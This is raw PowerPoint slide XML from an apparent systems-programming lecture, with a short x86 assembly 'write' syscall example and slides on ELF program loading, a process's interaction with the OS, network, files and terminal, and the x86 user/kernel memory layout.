            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$12,%edx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	ret	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58969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 Loading and Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a program is invoked, the operating system creates a process to execute the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF file is parsed and parts are copied into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Linux /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/maps shows the memory layout of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation of objects and reference resolution is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer is set to the location specified as the start address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution begins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1107685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ounded Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="4486336"/>
            <a:ext cx="1447800" cy="1171515"/>
          </a:xfrm>
          <a:prstGeom prst="round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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4375653" y="2213710"/>
            <a:ext cx="2938675" cy="2099438"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4822187" y="2571498"/>
            <a:ext cx="2088558" cy="1527208"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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defTabSz="914400" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794693" y="4486335"/>
            <a:ext cx="5562491" cy="1062748"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Can 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346953" y="4628035"/>
            <a:ext cx="1039031" cy="858070"/>
          </a:xfrm>
          <a:prstGeom prst="can">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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2319456" y="2911895"/>
            <a:ext cx="1427357" cy="1062748"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Cloud 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220401" y="4628035"/>
            <a:ext cx="1456001" cy="921048"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5426034" y="4302633"/>
            <a:ext cx="871145" cy="10493"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3022636" y="3462950"/>
            <a:ext cx="2466388" cy="1598057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2466388"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2130743"/>
              <a:gd name="connsiteX1" fmla="*/ 10496 w 2466388"/>
              <a:gd name="connsiteY1" fmla="*/ 2130743 h 2130743"/>
              <a:gd name="connsiteX2" fmla="*/ 1889148 w 2466388"/>
              <a:gd name="connsiteY2" fmla="*/ 2120247 h 2130743"/>
              <a:gd name="connsiteX3" fmla="*/ 2466388 w 2466388"/>
              <a:gd name="connsiteY3" fmla="*/ 461836 h 2130743"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2466388" h="2130743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3499" y="710248"/>
                  <a:pt x="10496" y="2130743"/>
                  <a:pt x="10496" y="2130743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1889148" y="2120247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466388" y="461836"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangl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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734669" y="3872304"/>
            <a:ext cx="4932774" cy="1346147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4932774"/>
              <a:gd name="connsiteY0" fmla="*/ 1794862 h 1794862"/>
              <a:gd name="connsiteX1" fmla="*/ 4355535 w 4932774"/>
              <a:gd name="connsiteY1" fmla="*/ 1784366 h 1794862"/>
              <a:gd name="connsiteX2" fmla="*/ 4932774 w 4932774"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1794862"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4932774" h="1794862">
                <a:moveTo>
                  <a:pt x="0" y="1794862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4355535" y="1784366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4932774" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangl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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6066263" y="3880177"/>
            <a:ext cx="1574290" cy="1172959"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1574290 w 1574290"/>
              <a:gd name="connsiteY0" fmla="*/ 1553448 h 1563945"/>
              <a:gd name="connsiteX1" fmla="*/ 713678 w 1574290"/>
              <a:gd name="connsiteY1" fmla="*/ 1563945 h 1563945"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1574290"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1563945"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574290" h="1563945">
                <a:moveTo>
                  <a:pt x="1574290" y="1553448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="713678" y="1563945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangl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a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577643" y="3105159"/>
            <a:ext cx="889987" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325492" y="4731909"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171791" y="2246556"/>
            <a:ext cx="1390124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434685" y="4766535"/>
            <a:ext cx="864339" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655428" y="4407559"/>
            <a:ext cx="1015150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200020" y="3105159"/>
            <a:ext cx="1312679" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079178" y="4558785"/>
            <a:ext cx="477602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7769498" y="4743451"/>
            <a:ext cx="774883" cy="891316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="707290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7" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="3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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="3375621"/>
            <a:ext cx="2331843" cy="2146091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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t>3GB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="2565357"/>
            <a:ext cx="2331843" cy="810260"/>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t>1GB Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020450" y="2074112"/>
            <a:ext cx="530915" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681943" y="5249450"/>
            <a:ext cx="1338828" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941180" y="2552040"/>
            <a:ext cx="1189035" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042507" y="3375620"/>
            <a:ext cx="1044517" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
